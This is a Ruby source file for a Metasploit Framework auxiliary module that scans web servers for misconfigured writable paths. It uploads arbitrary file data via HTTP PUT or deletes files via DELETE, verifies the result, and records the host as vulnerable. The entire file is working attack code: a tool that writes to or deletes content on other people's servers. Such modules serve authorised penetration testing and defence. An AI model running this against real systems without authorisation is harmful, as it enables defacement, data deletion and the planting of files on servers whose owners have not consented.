## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report def initialize super( 'Name' => 'HTTP Writable Path PUT/DELETE File Access', 'Version' => '$Revision$', 'Description' => %q{ This module can abuse misconfigured web servers to upload and delete web content via PUT and DELETE HTTP requests. Set ACTION to either PUT or DELETE. PUT is the default. If filename isn't specified, the module will generate a random string for you as a .txt file. If DELETE is used, a filename is required. }, 'Author' => [ 'Kashif [at] compulife.com.pk', 'CG', 'sinn3r', ], 'License' => MSF_LICENSE, 'References' => [ [ 'OSVDB', '397'], ], 'Actions' => [ ['PUT'], ['DELETE'] ], 'DefaultAction' => 'PUT' ) register_options( [ OptString.new('PATH', [true, "The path to attempt to write or delete", "/"]), OptString.new('FILENAME', [true, "The file to attempt to write or delete", "msf_http_put_test.txt"]), OptString.new('FILEDATA', [false, "The data to upload into the file", "msf test file"]), OptString.new('ACTION', [true, "PUT or DELETE", "PUT"]) ], self.class) end # # Send a normal HTTP request and see if we successfully uploaded or deleted a file. # If successful, return true, otherwise false. # def file_exists(path, data) begin res = send_request_cgi( { 'uri' => path, 'method' => 'GET', 'ctype' => 'text/plain', 'data' => data, }, 20 ).to_s rescue ::Exception => e print_error("Error: #{e.to_s}") return nil end return (res =~ /#{data}/) ? true : false end # # Do a PUT request to the server. Function returns the HTTP response. # def do_put(path, data) begin res = send_request_cgi( { 'uri' => path, 'method' => 'PUT', 'ctype' => 'text/plain', 'data' => data, }, 20 ) rescue ::Exception => e print_error("Error: #{e.to_s}") return nil end return res end # # Do a DELETE request. Function returns the HTTP response. # def do_delete(path) begin res = send_request_cgi( { 'uri' => path, 'method' => 'DELETE', 'ctype' => 'text/html', }, 20 ) rescue ::Exception => e print_error("Error: #{e.to_s}") return nil end return res end # # Main function for the module, duh! # def run_host(ip) path = datastore['PATH'] data = datastore['FILEDATA'] #Add "/" if necessary path = "/#{path}" if path[0,1] != '/' if path[-1,1] != '/' path += '/' end path += datastore['FILENAME'] case action.name when 'PUT' #Append filename if there isn't one if path !~ /(.+\.\w+)$/ path << "#{Rex::Text.rand_text_alpha(5)}.txt" vprint_status("No filename specified. Using: #{path}") end #Upload file res = do_put(path, data) vprint_status("Reply: #{res.code.to_s}") if not res.nil? #Check file if not res.nil? and file_exists(path, data) print_good("File uploaded: #{(ssl ? 'https' : 'http')}://#{ip}:#{rport}#{path}") report_vuln( :host => ip, :port => rport, :proto => 'tcp', :name => self.fullname, :info => "PUT Enabled", :refs => self.references, :exploited_at => Time.now.utc ) else print_error("File doesn't seem to exist. The upload probably failed.") end when 'DELETE' #Check file before deleting if path !~ /(.+\.\w+)$/ print_error("You must supply a filename") return elsif not file_exists(path, data) print_error("File is already gone. Will not continue DELETE") return end #Delete our file res = do_delete(path) vprint_status("Reply: #{res.code.to_s}") if not res.nil? #Check if DELETE was successful if res.nil? or file_exists(path, data) print_error("DELETE failed. File is still there.") else print_good("File deleted: #{(ssl ? 'https' : 'http')}://#{ip}:#{rport}#{path}") report_vuln( :host => ip, :port => rport, :proto => 'tcp', :sname => (ssl ? 'https' : 'http'), :name => self.fullname, :info => "DELETE ENABLED", :refs => self.references, :exploited_at => Time.now.utc ) end end end end